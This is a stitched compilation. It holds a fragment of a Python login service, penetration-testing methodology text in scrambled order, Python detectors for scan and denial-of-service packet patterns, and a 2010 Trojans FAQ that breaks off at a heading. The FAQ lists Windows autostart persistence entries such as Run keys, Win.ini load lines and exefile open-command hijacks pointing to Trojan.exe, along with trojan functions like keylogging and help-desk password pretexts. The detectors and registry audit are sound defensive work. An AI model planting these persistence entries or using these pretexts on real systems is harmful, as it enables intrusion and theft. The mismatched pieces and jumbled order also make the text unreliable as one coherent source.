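def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class FakeClock:
    """Injectable clock so lockout and session expiry can be exercised without waiting."""
    def __init__(self, start: float = 1_000.0) -> None:
        self.t = start

    def __call__(self) -> float:
        return self.t


class LoginService:
    def __init__(self, clock=time.time) -> None:
        self.clock = clock
        self.accounts: Dict[str, Account] = {}
        self.sessions: Dict[str, Tuple[str, float]] = {}  # token -> (user, expiry time)

    def register(self, username: str, password: str) -> None:
        salt = secrets.token_bytes(16)
        self.accounts[username] = Account(salt, _hash_password(password, salt))

    @staticmethod
    def _valid_input(username: str, password: str) -> bool:
        # Length and character checks run before anything else touches the fields.
        return (len(username) <= MAX_FIELD_LEN and len(password) <= MAX_FIELD_LEN
                and USERNAME_RE.fullmatch(username) is not None)

    def login(self, username: str, password: str) -> Tuple[str, Optional[str]]:
        """Return (status, session token); status is 'rejected_input', 'invalid',
        'locked' or 'ok'. Only 'ok' carries a token."""
        if not self._valid_input(username, password):
            return "rejected_input", None
        now = self.clock()
        acct = self.accounts.get(username)
        if acct is None:
            return "invalid", None
        if now < acct.locked_until:
            return "locked", None      # the lockout also applies to a correct password
        if hmac.compare_digest(_hash_password(password, acct.salt), acct.password_hash):
            acct.failures = 0
            token = secrets.token_urlsafe(32)  # 256 random bits: not guessable
            self.sessions[token] = (username, now + SESSION_TTL)
            return "ok", token
        acct.failures += 1
        if acct.failures >= MAX_FAILURES:
            acct.failures = 0
            acct.locked_until = now + LOCKOUT_SECONDS
        return "invalid", None

    def session_user(self, token: str) -> Optional[str]:
        """Resolve a presented token; unknown or timed-out tokens yield None."""
        entry = self.sessions.get(token)
        if entry is None:
            return None
        user, expires_at = entry
        if self.clock() >= expires_at:
            del self.sessions[token]   # a timed-out session cannot be reused
            return None
        return user

    @staticmethod
    def cookie_header(token: str) -> str:
        # Flags that limit cookie theft: never sent over plain HTTP, never readable by script.
        return (f"Set-Cookie: session={token}; Secure; HttpOnly; "
                f"SameSite=Strict; Max-Age={SESSION_TTL}")
```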

Functionality testing: This involves testing the systems responsible for the application's functionality as presented to a user. This will require testing:

Input validation – bad characters, specific URLs or overlong inputs can produce unpredictable results; and

Transaction testing – ensuring that the application performs to specification and does not permit the user to abuse the system.

War dialing

War dialling is a technique for systematically calling a range of telephone numbers in an attempt to identify modems, remote access devices and maintenance connections of computers that may exist on an organization's network. Using war dialing tactics, a hacker may be able to locate vulnerable out-of-band entry points into an organization and manipulate them to access the network. The failure of IT staff to consider the phone network as a possible primary access point is one of the main factors in the growth of these attacks. For example, leaving open modems on critical network servers, routers and other devices can inadvertently expose an entry point into the organization's network. In this testing, once a modem or other access device has been identified, analysis and exploitation techniques are performed to assess whether this connection can be used to penetrate the organization's information systems network.

Penetration testing for wireless networks

The introduction of wireless networks, whether inside corporate network infrastructure or common homes, introduces additional security exposures that are much more threatening than wired network attacks. Since the only boundary a wireless network knows is its signal, it becomes easy for hackers to identify wireless networks simply by "driving" or walking around office buildings with their wireless network equipment; this technique is known as "war driving". Once an open wireless access point is found, the war driver usually maps it, so that at the end he has a map of access points with their properties (SSID, WEP, MAC etc.). The goal of wireless network testing is to identify security gaps or flaws in the design, implementation or operation of the organization's wireless network.

Social engineering

Often used in conjunction with blind and double blind testing, social engineering refers to techniques that exploit human nature (the most exploited traits being trust and the willingness to help) with the objective of gathering information. This is done using social interaction, typically with the organization's employees, suppliers and contractors, to gather information and penetrate the organization's systems. Such techniques could include:

Non face-to-face: Posing as a representative of the IT department's help desk and asking users to divulge their user account and password information;

Face-to-face or advanced social engineering: Posing as an employee and gaining physical access to restricted areas that may house sensitive information; intercepting mail, courier packages or even trash (dumpster diving) to search for sensitive information on printed materials.

Social engineering activities can test a less technical, but equally important, security component: the ability of the organization's people to contribute to or prevent unauthorized access to information and information systems. This also helps determine the level of security awareness among employees.



Penetration testing strategies

Based on specific objectives to be achieved, the different penetration testing strategies include:




External testing strategy

External testing refers to attacks on the organization's network perimeter using procedures performed from outside the organization's systems, that is, from the Internet or Extranet. This test may be performed with non- or full disclosure of the environment in question. The test typically begins with publicly accessible information about the client, followed by network enumeration, targeting the company's externally visible servers or devices, such as the domain name server (DNS), e-mail server, Web server or firewall.



Internal testing strategy

Internal testing is performed from within the organization's technology environment. This test mimics an attack on the internal network by a disgruntled employee or an authorized visitor having standard access privileges. The focus is to understand what could happen if the network perimeter were successfully penetrated or what an authorized user could do to penetrate specific information resources within the organization's network. The techniques employed are similar in both types of testing although the results can vary greatly.



Blind testing strategy

A blind testing strategy aims at simulating the actions and procedures of a real hacker. Just like a real hacking attempt, the testing team is provided with only limited or no information concerning the organization prior to conducting the test. The penetration testing team uses publicly available information (such as the corporate Web site, domain name registry, Internet discussion boards, USENET and other sources of information) to gather information about the target and conduct its penetration tests. Blind testing can provide a lot of information about the organization (so called inside information) that may have been otherwise unknown -- for example, a blind penetration may uncover such issues as additional Internet access points, directly connected networks, publicly available confidential/proprietary information, etc. But it is more time consuming and expensive because of the effort required by the testing team to research the target.



Double blind testing strategy

A double-blind test is an extension of the blind testing strategy. In this exercise, the organization's IT and security staff are not notified or informed beforehand and are "blind" to the planned testing activities. Double-blind testing is an important component of testing, as it can test the organization's security monitoring and incident identification, escalation and response procedures. As is clear from the objective of this test, only a few people within the organization are made aware of the testing. Normally it's only the project manager who carefully watches the whole exercise to ensure that the testing procedures and the organization's incident response procedures can be terminated when the objectives of the test have been achieved.



Targeted testing strategy

Targeted testing, or the lights-turned-on approach as it is often referred to, involves both the organization's IT team and the penetration testing team in carrying out the test. There is a clear understanding of the testing activities and information concerning the target and the network design. A targeted testing approach may be more efficient and cost-effective when the objective of the test is focused more on the technical setting, or on the design of the network, than on the organization's incident response and other operational procedures. Unlike blind testing, a targeted test can be executed in less time and with less effort; the trade-off is that it may not provide as complete a picture of an organization's security vulnerabilities and response capabilities.

Now that we have explored the different strategies in penetration testing, let's take a look at some of the techniques/methods used in a penetration test and how they help in performing a successful penetration test:





Passive research

As the name suggests, passive research is a method used to gather as much information as possible about an organization's systems configuration from public-domain sources such as:

DNS (domain name service)

RIPE (Réseaux IP Européens)

USENET (newsgroups)

ARIN (American Registry for Internet Numbers)

*Passive research is generally performed at the beginning of an external penetration test.





Open source monitoring

This service is an associated technique that utilizes Internet meta-searches (multiple searches of Web sites, newswires, newsgroups and other sources) targeted on keywords that are important to the organization. The data is collected and discoveries are highlighted to the organization. This helps identify whether the organization's confidential information has been leaked or whether an electronic conversation involving them has taken place. This enables an organization to take the necessary measures to ensure confidentiality and integrity.



Network mapping and OS fingerprinting

Visualization of network configuration is an important part of penetration testing. Network mapping is used to create a picture of the configuration of the network being tested. A network diagram can be created which infers the logical locations and IP addresses of routers, firewalls, Web servers and other border devices.

Additionally, this examination can assist in identifying or "fingerprinting" operating systems. A combination of results from passive research and tools such as ping, traceroute and nmap, can help create a reasonably accurate network map.



An extension of network mapping is port scanning. This technique is aimed at identifying the type of services available on the target machine. The scan result reveals important information such as the function of a computer (whether it is a Web server, mail server, etc.) as well as revealing ports that may be serious security risks, such as telnet. Port scans should include a number of individual tests, including:



TCP (Transmission Control Protocol) scan

Connect scan

SYN (or half open) scan

RST (or Xmas-tree) scan

UDP (User Datagram Protocol) and ICMP (Internet Control Message Protocol) scans. Tools such as nmap can perform this type of scan.

Dynamic ports used by RPC (Remote Procedure Call) should be scanned using a tool such as RPCinfo.
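What the Denial of Service patterns listed earlier (land attack, ping of death, half-open SYN flood) and the scan types listed above (SYN, Xmas-tree, and port sweeps) look like to the defender, as an added example that is not part of the original article: detection logic run over a constructed set of packet summaries. The record format, the addresses and the thresholds are assumptions made for this example, not real captures.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, FrozenSet, List


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str               # "TCP", "UDP" or "ICMP"
    sport: int
    dport: int
    flags: FrozenSet[str]    # TCP flag letters (S, A, F, P, U, R); empty otherwise
    length: int              # IP total length in bytes


def parse_record(line: str) -> Packet:
    """Constructed one-line format: src dst proto sport dport flags length,
    with flags written as 'S|A' or '-' when there are none."""
    src, dst, proto, sport, dport, flags, length = line.split()
    flagset = frozenset() if flags == "-" else frozenset(flags.split("|"))
    return Packet(src, dst, proto, int(sport), int(dport), flagset, int(length))


def land_attack_packets(pkts: List[Packet]) -> List[Packet]:
    """Land attack: a SYN whose source address and port equal its destination."""
    return [p for p in pkts if p.proto == "TCP" and "S" in p.flags
            and p.src == p.dst and p.sport == p.dport]


def oversized_packets(pkts: List[Packet], max_len: int = 65535) -> List[Packet]:
    """Ping of death: a datagram whose declared length exceeds the IP maximum."""
    return [p for p in pkts if p.length > max_len]


def half_open_syn_sources(pkts: List[Packet], threshold: int) -> List[str]:
    """Half-open SYN flood: sources sending many bare SYNs but never an ACK."""
    syns: Dict[str, int] = defaultdict(int)
    acks: Dict[str, int] = defaultdict(int)
    for p in pkts:
        if p.proto != "TCP":
            continue
        if p.flags == {"S"}:
            syns[p.src] += 1
        elif "A" in p.flags:
            acks[p.src] += 1
    return sorted(s for s, n in syns.items() if n - acks[s] >= threshold)


def xmas_scan_sources(pkts: List[Packet]) -> List[str]:
    """Xmas-tree scan: FIN, PSH and URG set together, never seen in a normal handshake."""
    return sorted({p.src for p in pkts
                   if p.proto == "TCP" and {"F", "P", "U"} <= p.flags})


def port_scan_sources(pkts: List[Packet], threshold: int) -> List[str]:
    """Port scan: one source touching many distinct ports on one destination."""
    ports: Dict[tuple, set] = defaultdict(set)
    for p in pkts:
        if p.proto in ("TCP", "UDP"):
            ports[(p.src, p.dst)].add(p.dport)
    return sorted({src for (src, _), seen in ports.items() if len(seen) >= threshold})


def constructed_sample() -> List[str]:
    """Constructed traffic: one normal handshake, one land packet, one oversized
    ICMP datagram, a SYN flood from 203.0.113.7 and a SYN + Xmas scan from 203.0.113.8."""
    lines = [
        "192.0.2.10 10.0.0.5 TCP 51000 80 S 60",
        "10.0.0.5 192.0.2.10 TCP 80 51000 S|A 60",
        "192.0.2.10 10.0.0.5 TCP 51000 80 A 52",
        "10.0.0.5 10.0.0.5 TCP 139 139 S 40",
        "198.51.100.9 10.0.0.5 ICMP 0 0 - 65600",
        "203.0.113.8 10.0.0.5 TCP 40000 22 F|P|U 40",
    ]
    lines += [f"203.0.113.7 10.0.0.5 TCP {40000 + i} 80 S 40" for i in range(60)]
    lines += [f"203.0.113.8 10.0.0.5 TCP 40001 {port} S 40" for port in range(1, 26)]
    return lines


def triage(lines: List[str]) -> Dict[str, list]:
    """Run every detector over the records and report what each one flagged."""
    pkts = [parse_record(line) for line in lines]
    return {
        "land": [(p.src, p.dport) for p in land_attack_packets(pkts)],
        "oversized": [(p.src, p.length) for p in oversized_packets(pkts)],
        "syn_flood": half_open_syn_sources(pkts, threshold=50),
        "xmas": xmas_scan_sources(pkts),
        "port_scan": port_scan_sources(pkts, threshold=20),
    }


if __name__ == "__main__":
    for kind, hits in triage(constructed_sample()).items():
        print(f"{kind:10s} {hits}")
```

Note that a SYN scan and a half-open flood differ only in volume and port spread, which is why the two thresholds are kept separate.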



Spoofing

Spoofing involves the creation of TCP/IP packets using somebody else's Internet addresses and then sending them to the targeted computer, making it believe that they came from a trusted source. It is the act of using one machine to impersonate another. Routers use the "destination IP" address in order to forward packets through the Internet, but ignore the "source IP" address. The destination machine only uses that source IP address when it responds back to the source. This technique is used in internal and external penetration testing to access computers that have been instructed to only reply to specific computers. This can result in sensitive information being released to unauthorised systems. IP spoofing is also an integral part of many network attacks that do not need to see responses (blind spoofing).



Network sniffing

Sniffing is a technique used to capture data as it travels across a network. Sniffing is an important information gathering technique that enables the capture of specific information, such as passwords, and also of an entire conversation between specific computers, if required. To perform sniffing, the network card of the computer needs to be put in promiscuous mode, so that it captures all data being sent across the network.

Sniffing is extensively used in internal testing where the sniffer or the computer in promiscuous mode is directly attached to the network enabling capturing of a great deal of information. Sniffing can be performed by a number of commercial tools such as Ethereal, Network Associates SnifferPro and Network Instruments Observer.





Trojan attack

Trojans are malicious programs that are typically sent into a network as e-mail attachments or transferred via IM chat rooms. These programs run in stealth mode and get installed on the client computer without the user's knowledge. Once installed, they can open remote control channels to attackers or capture information. A penetration test aims at attempting to send specially prepared Trojans into a network.



Brute force attack

A brute force attack involves trying a huge number of alphanumeric combinations and exhaustive trial and error methods in order to find legitimate authentication credentials. The objective behind this time consuming exercise is to gain access to the target system. Brute force attacks can overload a system and can possibly stop it from responding to legitimate requests. Additionally, if account lockout is being used, brute force attacks may close the account to legitimate users.



Vulnerability scanning/analysis

Vulnerability scanning/analysis is an exhaustive examination of targeted areas of an organization's network infrastructure aimed at determining their current state. The targets range from a single system or only critical systems to scanning the entire network. It is usually performed using automated tools that test for a multitude of potential weaknesses in a system against a database of known vulnerabilities and report potential security holes. And although they don't actively prevent attacks, many scanners provide additional tools to help fix found vulnerabilities. Some of the commonly used vulnerability scanners include: the open-source Nessus Project's Nessus, ISS Internet Scanner, GFI Software's GFI LANguard Network Security Scanner, eEye Digital Security's Retina Network Security Scanner, the BindView RMS vulnerability-management solutions and Network Associates CyberCop.



Scenario analysis

Once vulnerability scanning has been done and weaknesses identified, the next step is to perform scenario testing. This testing aims at exploiting identified security weaknesses to perform a system penetration that will produce a measurable result, such as stolen information, stolen usernames and passwords or system alteration. This level of testing ensures that no false positives are reported and makes the risk assessment of vulnerabilities much more accurate. Many tools exist to assist exploit testing, although the process is often highly manual. Exploit testing tends to be the final stage of penetration testing.



Performing a penetration test

What makes a good penetration test?




While there are clear advantages to performing a penetration test, what makes it worth the exercise is the result. The results need to be of value and easily understandable to the client.



There's a general misconception that penetration testing is all about using fancy automated security tools and handing over the generated reports as the deliverable.


But, it takes more than just security tools to successfully conduct a penetration test. While these automated security-testing tools play an important role within the exercise, they have limitations.


The fact is that these tools can never provide a true simulation of a skilled attacker. No matter how comprehensive the reports produced by the security tools are, there's always a need to explain them.



Let's take a look at some of the key factors that make a good pen-test:

*  Establish the parameters: Defining the scope of work is the first and most important step to performing a successful penetration test. This will define the boundaries, objectives and the validation of procedures (the success criteria).

*  Know da man: Hire skilled and experienced consultants to perform the test, the ones who know what they are doing. In other words, separate the professionals from the amateurs. Make sure they are:

-Legally capable
-Experienced
-And, abide by the non disclosure agreement.

*  Choose an adequate set of tests: A mix of manual and automated testing will yield the best balance of cost and benefits.

*  Follow a methodology: It's not a guessing game. Everything needs to be planned, documented and followed.

*  Resulting value: The results should be documented carefully and efforts should be made to make them understandable to the client. Whether it's a technical report or an executive summary, there is always a need to explain. The security consultant /tester should be available to answer queries or explain results.

*  Findings and recommendations: This is a very important part of a pen-test. The final report must clearly state the findings and must map the same to the potential risks. This should be accompanied by a remediation roadmap based on the BEST SECURITY PRACTICES.

Before we get into the testing strategies and techniques used in penetration testing, let's take a look at some scenarios where it can be useful:


*  Setting up a new office

Whether it's a new business set up or the addition of new sites, penetration testing helps identify potential weaknesses in the network infrastructure. For example, internal testing is critical when adding new sites, as it will examine which network resources are available and reveal the type of traffic passing between sites.



*  Deployment of new network infrastructure

Every new network infrastructure should be thoroughly tested to simulate the actions of a hacker. While an external test is generally performed (with little prior knowledge of the infrastructure) to ensure perimeter security, the internal testing should also be executed to ensure that network resources such as: servers, storage, routing and access devices are sufficiently hardened and that the infrastructure is secure from any attack, assuming that the perimeter is breached.



*  Changes/upgrade to existing infrastructure

Changes are inevitable -- be it software, hardware or network design, changes/upgrades are performed to enhance features, to fix critical bugs and/or to accommodate a new requirement. Whenever existing infrastructure is changed, it should be tested again to ensure that new vulnerabilities have not arisen. The amount of testing required will depend on the nature and level of the changes made to the infrastructure. While minor changes such as configuration changes to a particular rule will only require a port scan to confirm the expected firewall behaviour, major changes such as upgrades of critical equipment/OS version may require a full retest.



*  Rolling out a new application

Once the infrastructure has been thoroughly tested, new applications (whether Internet facing or Intranet hosted) must also be tested for security before they are put into production. This testing needs to be performed on a "real-life" platform, ensuring that the application only uses the defined ports and that the code itself is secure.



*  Changing/upgrading an existing application

As with infrastructure changes, application changes also vary in nature. Very minor changes such as user account changes will not require testing. However, major changes involving the functionality of the application should be thoroughly retested.



*  Periodic repeat testing

Managing security is not easy and companies should not consider a penetration test as the final remedy for all security problems. A company that does is falling for a false sense of security. It's always good practice to perform periodic testing of sensitive systems to ensure that unscheduled changes have not been made.


Introduction to penetration testing

Why penetration testing?


Penetration testing is one of the oldest methods for assessing the security of a computer system. In the early 1970s, the Department of Defense used this method to demonstrate the security weaknesses in computer systems and to initiate the development of programs to create more secure systems.

Penetration testing is increasingly used by organizations to assure the security of Information systems and services, so that security weaknesses can be fixed before they get exposed.

The frequency and severity of network intrusions, data theft and attacks caused by malicious code, hackers and disgruntled employees continue to increase, and the risks and costs associated with network security breaches and data theft are astronomical.

With every ebusiness initiative, the demand for secure, remote access to company networks is also increasing. The truth is, even well managed implementations, involving the latest hardware and software may be susceptible to misconfigurations or software flaws.

These may eventually give an intruder access to sensitive information. Using penetration testing tools can significantly reduce the risk of this occurring.



While the principal objective of penetration testing is to determine security weaknesses in an organization's network infrastructure, it can have a number of secondary objectives, including testing the organization's security incident identification and response capability, testing employee security awareness or testing security policy compliance.


Reasons to perform a network penetration test

• A penetration test helps organizations to understand their current security posture by identifying gaps in security. This enables organizations to develop an action plan to minimize the threat of attack or misuse.

• A well-documented penetration test result helps managers in creating a strong business case to justify a needed increase in the security budget or make the security message heard at the executive level.

• Security is not a single point solution, but a process that requires due diligence. Security measures need to be examined on a regular basis to discover new threats. A penetration test and an unbiased security analysis enable organizations to focus internal security resources where they are needed most. In addition, the independent security audits are rapidly becoming a requirement for obtaining cyber-security insurance.

• Meeting regulatory and legislative requirements is a must for conducting business today. Penetration testing tools help organizations meet these regulatory requirements.

• One of the core objectives of an e-business initiative is to enable close working with strategic partners, suppliers, customers and others upon whom the ebusiness depends. To accomplish this goal, organizations sometimes allow partners, suppliers, B2B exchanges, customers and other trusted connections into their networks. A well executed penetration test and security audits help organizations find the weakest links in this complex structure and ensure that all connected entities have a standard baseline for security.

• Once security practices and infrastructure are in place, a penetration test provides critical validation feedback between business initiatives and a security framework that allows for successful implementation at minimal risk.



Tuesday, July 6, 2010

Trojans FAQ - All You Need to Know about Trojans.

01.Introduction


Trojan Horses pose one of the most significant threats to the Windows OS, exposing sensitive information to malicious attackers as well as providing them with full access to the computer, which often results in further illegal activities done via the infected computer. This paper will cover the Windows Trojans topic in depth; it will highlight a lot of the important aspects, but will also act as a FAQ, summarizing the topic in a brief, easy to understand, yet effective and informative way. The FAQ will be updated on a monthly basis, so be sure to come back, although we've created a Newsletter for your convenience that will let you know when the site is being updated.

02.What is a Trojan horse?

Basically a Trojan horse can be defined as:

An unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.

A legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.

Any program that appears to perform a desirable and necessary function but (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.

The trojan has borrowed its name from the old mythical story about how the Greeks gave their enemy a huge wooden horse as a gift, but after the enemy accepted it, during the night the Greek soldiers crept out of the horse and conquered the city.


03.How do Trojans work?


Most trojans come in two parts, a Client and a Server, but there are exceptions where the trojan does not need a Client, as it's able to automatically do what it was intended to do (stealing passwords, business data etc.) without any intervention from the attacker. Those that use both Client and Server in order to operate, however, need assistance from the attacker. Once the victim runs the Server (unknowingly), the attacker will use a port to connect to the Server (your computer) and start using the Trojan. TCP/IP is the usual protocol used, but there are exceptions using ICMP and UDP as well. When the Server is executed on the victim's machine, it will hide itself somewhere within the computer and start listening on the port specified by the attacker. Some trojans, however, do not start listening for incoming connections as soon as they are run but wait a period of time first, to reduce the risk of being detected.



It's necessary for the attacker to know the victim's IP address to connect to his/her machine. Many trojans have features such as the ability to mail the victim's IP, as well as the ability to message the attacker via ICQ or IRC. This is used when the victim has a dynamic IP, which means that every time you connect to the Internet you get a different IP (most of the dial-up users have this). ADSL users have static IPs so the infected IP is always known to the attacker and this makes it considerably easier to connect to your machine.



Most Trojans use auto-starting methods in order to run each time your computer is started. These methods include, but are not limited to, using the Windows Registry, using some of the Windows system files, as well as using third party configuration files.



System files are located in the Windows Directory. Here is a brief explanation of most of the common auto-starting methods that use the Windows System Files:



Autostart Folder

The Autostart folder is located in C:\Windows\Start Menu\Programs\startup and as its name suggests, automatically starts everything placed within this folder.



Win.ini

A Windows system file; lines of the form load=Trojan.exe and run=Trojan.exe make it execute the Trojan at startup.



System.ini

A line such as Shell=Explorer.exe trojan.exe causes every file listed after Explorer.exe to be executed.



Wininit.ini

Mostly used by Setup-Programs. Once it is run, it is auto-deleted, which is very handy for trojans to restart.



Winstart.bat

Acting as a normal bat file, the trojan is added as @trojan.exe to hide its execution from the user.



Autoexec.bat

It's a DOS auto-starting file and it's used as an auto-starting method like this -> c:\Trojan.exe



Config.sys

It could also be used as an auto-starting method for trojans.



Explorer Startup

An auto-starting method for Windows 95, 98 and ME: if c:\explorer.exe exists, it will be started instead of the usual c:\Windows\Explorer.exe, which is the common path to the file.



Windows Registry is another commonly used place regarding the auto-starting methods of the Trojans. Here are some known ways:



[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]

"Info"="c:\directory\Trojan.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]

"Info"="c:\directory\Trojan.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]

"Info"="c:\directory\Trojan.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]

"Info"="c:\directory\Trojan.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

"Info"="c:\directory\Trojan.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

"Info"="c:\directory\Trojan.exe"



- Registry Shell Open



[HKEY_CLASSES_ROOT\exefile\shell\open\command]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command]



The default value of this key is normally "%1 %*"; if an executable file is placed in front of it, that file will be executed each time you open a binary file. It's used like this: trojan.exe "%1 %*"; this restarts the trojan each time a binary file is opened.



- ICQ Net Detect Method



[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\]



This key includes all the files that will be executed when ICQ detects an Internet connection. As you can understand, this feature of ICQ is very handy but it's frequently abused by attackers as well.



- ActiveX Component



[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\InstalledComponents\KeyName]

StubPath=C:\directory\Trojan.exe



All of the aforementioned methods are well known to the community, although you should not rely on them (by checking these Registry Entries, as well as the System Files ones) as a foolproof method for detecting Trojans, because new methods are discovered literally every day.
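The registry keys above are easiest to review from an exported copy rather than by clicking through regedit. The following Python script is an added example for this page, not code from the original paper or its author: it parses the text that `reg export` or regedit writes, lists every value under the Run-style keys named above so an analyst can inspect each command line, and flags an exefile\shell\open\command whose default value is not the stock `"%1" %*` (the form that value normally has on Windows). The registry export embedded in the script is constructed sample data, not taken from a real host.

```python
import re

# Autostart keys the FAQ lists; the HKLM and HKCU hives share the same suffix.
RUN_KEY_SUFFIXES = (
    r"\Software\Microsoft\Windows\CurrentVersion\Run",
    r"\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"\Software\Microsoft\Windows\CurrentVersion\RunServices",
    r"\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce",
)
# "Registry Shell Open" keys from the FAQ.
SHELL_OPEN_KEYS = (
    r"HKEY_CLASSES_ROOT\exefile\shell\open\command",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command",
)
# Stock default value of the exefile open command: the file, then its arguments.
STOCK_EXEFILE_COMMAND = '"%1" %*'

# "Name"="data" or @="data" (@ is the key's default value).
_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def _unescape(s):
    # Undo .reg string escaping (backslash-quote and backslash-backslash).
    return re.sub(r'\\(["\\])', r'\1', s)


def parse_reg_export(text):
    """Return {key_path: {value_name: data}} for the string values in a .reg export.

    Values of other types (dword:, hex:) cannot hold a command line and are skipped.
    The key's default value is stored under the name "@".
    """
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if current is None or not m:
            continue
        name = "@" if m.group(1) is None else _unescape(m.group(1))
        data = m.group(2)
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            keys[current][name] = _unescape(data[1:-1])
    return keys


def audit_autostarts(keys):
    """Return (key, value_name, data, reason) tuples an analyst should review."""
    findings = []
    shell_open = {k.lower() for k in SHELL_OPEN_KEYS}
    for key, values in keys.items():
        key_lower = key.lower()
        if any(key_lower.endswith(s.lower()) for s in RUN_KEY_SUFFIXES):
            # Every Run-style entry is worth a look; there is no safe default list.
            for name, data in values.items():
                findings.append((key, name, data, "autostart entry"))
        elif key_lower in shell_open:
            cmd = values.get("@", "")
            if cmd != STOCK_EXEFILE_COMMAND:
                findings.append((key, "@", cmd, "exefile open command is not the stock value"))
    return findings


# Constructed sample export (not from a real host): a benign Run entry, an
# entry using the FAQ's example path, and a hijacked exefile open command.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SoundMgr"="C:\\Windows\\System32\\soundmgr.exe"
"Info"="c:\\directory\\Trojan.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Cleanup"="\"C:\\Program Files\\Tool\\cleanup.exe\" /quiet"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="trojan.exe \"%1\" %*"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command]
@="\"%1\" %*"
'''

if __name__ == "__main__":
    for key, name, data, reason in audit_autostarts(parse_reg_export(SAMPLE_REG)):
        print(f"[{reason}] {key}\n    {name} = {data}")
```

On a real machine, export the hives with `reg export HKLM\Software\Microsoft\Windows\CurrentVersion hklm.reg` and the same for HKCU and HKCR\exefile; `reg export` writes UTF-16 text, so open the file with `encoding="utf-16"` before handing its contents to `parse_reg_export`. The script deliberately lists every Run entry rather than guessing which are malicious: as the paragraph above says, the value of the check lies in a person comparing each command line against what the machine is supposed to run.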






04.What are their functions?



Windows Trojans vary in their functions and abilities, although here's a brief summary of the most common ones:



Change the victim's resolution. This function displays a list of all the resolutions available on the victim's computer; the attacker just picks one and hits "change it!", and your resolution is changed.

Notify. The attacker is notified by e-mail, ICQ or IRC when you're online, and receives your IP if you have a dynamic one.

Processes monitoring. The attacker has the ability to monitor all of your processes, start new ones, as well as kill current ones.

Registry editor. It gives the attacker the ability to view/create/delete/change everything in the registry.

Find files feature. Provides the attacker with the opportunity to find any file on the hard drive, if he/she is looking for something particular.

ScrollLock, CapsLock, NumLock can be turned ON and OFF by the attacker, this function is defined as a "fun" one.

Disconnect victim. The attacker can hang up the victim's connection to the net at anytime.

Screenshot. The attacker can make screenshots of your activities, which are directly transferred to his/her computer, however there are more advanced functions including Web Cam monitoring, as well as microphone recording, if you have any of these of course.

Flip Screen. That's an obvious one, and it's again considered as a "fun" one

Hide/Show the victim's desktop icons. Annoying the victim is what amuses people sometimes.

FTP server. This option turns your PC into an FTP server accessible by the whole world, or by the attacker only.

Open the browser at an address specified by the attacker.

Hide/show the Start button.

Enable/Disable keyboard.

Chat with the victim. Interesting function enabling the attacker to open an ICQ look-alike chat with the victim.

Start/stop the victim's PC Speaker.

Restart windows.

Open/Close the CD-ROM tray.

Turn monitor on/off.

Get more information about the victim's computer. For example: Windows version, user name, company name, screen resolution, etc.

File manager. This function acts as an explorer for the attacker while browsing through your system.

Retrieve passwords. This function will provide the attacker with the recorded passwords on your computer.

KeyLogger. Logs all of the keys you've pressed; this can be done in offline or online mode.

There you have the most common Trojan functions. As you've noticed, most of these could be, and are, pretty dangerous and destructive ones.


05.How dangerous are they?


Windows Trojans represent a large security threat to your computer. Here I'll cover various scenarios, as well as provide you with further information so that you'll be able to realize how dangerous they are indeed.



As you've noticed while reading all of the aforementioned functions, they can be pretty dangerous. The attacker can have access to ALL of your files, personal information, sensitive work projects, and other confidential information just using the Keylogger, and the Explorer functions. In most cases the attacker will be looking for:



Credit Card Information (often used for domain registration, shopping with your credit card).

Any accounting data (E-mail passwords, Dial-Up passwords, WebServices passwords, etc.).

Email Addresses (Might be used for spamming, as explained above).

Work Projects (Steal your presentations and work related papers).

Children's names/pictures, Ages (pedophile attacker?!).

Schoolwork (steal your papers and publish them with his/her name on it).

You should realize that Trojans can be very destructive, and that they're not only used to delete files, but to steal people's work, job projects, and many other illegal activities.



On the other hand some advanced attackers will use your computer in order to commit further online crimes, and involve you in other illegal activities, thus turning your computer into a proxy, enabling them to move through your computer without any traces left, before they reach their potential aim. It can be illustrated as:



attacker--->your computer--->computer to be attacked

(turned into a proxy)



As you can see this is extremely dangerous to you, as the traces will lead back to you no matter what the attacker is doing while having access to your PC, and in 99% of the cases it will be an illegal activity.



You can contribute to a DDoS (Distributed Denial Of Service) attack, as your computer might be turned into a so-called "zombie", providing the attacker with the ability to use your bandwidth for flooding and causing damage to other networks.



06.What are the most common Trojans?


Here are the most popular kinds, although most trojans represent a combination of several of them. Let's not forget the non-public ones, which will never be released to the public and are used for the attacker's illegal activities; those are some of the most dangerous ones.



Remote Access Trojans (RAT's)



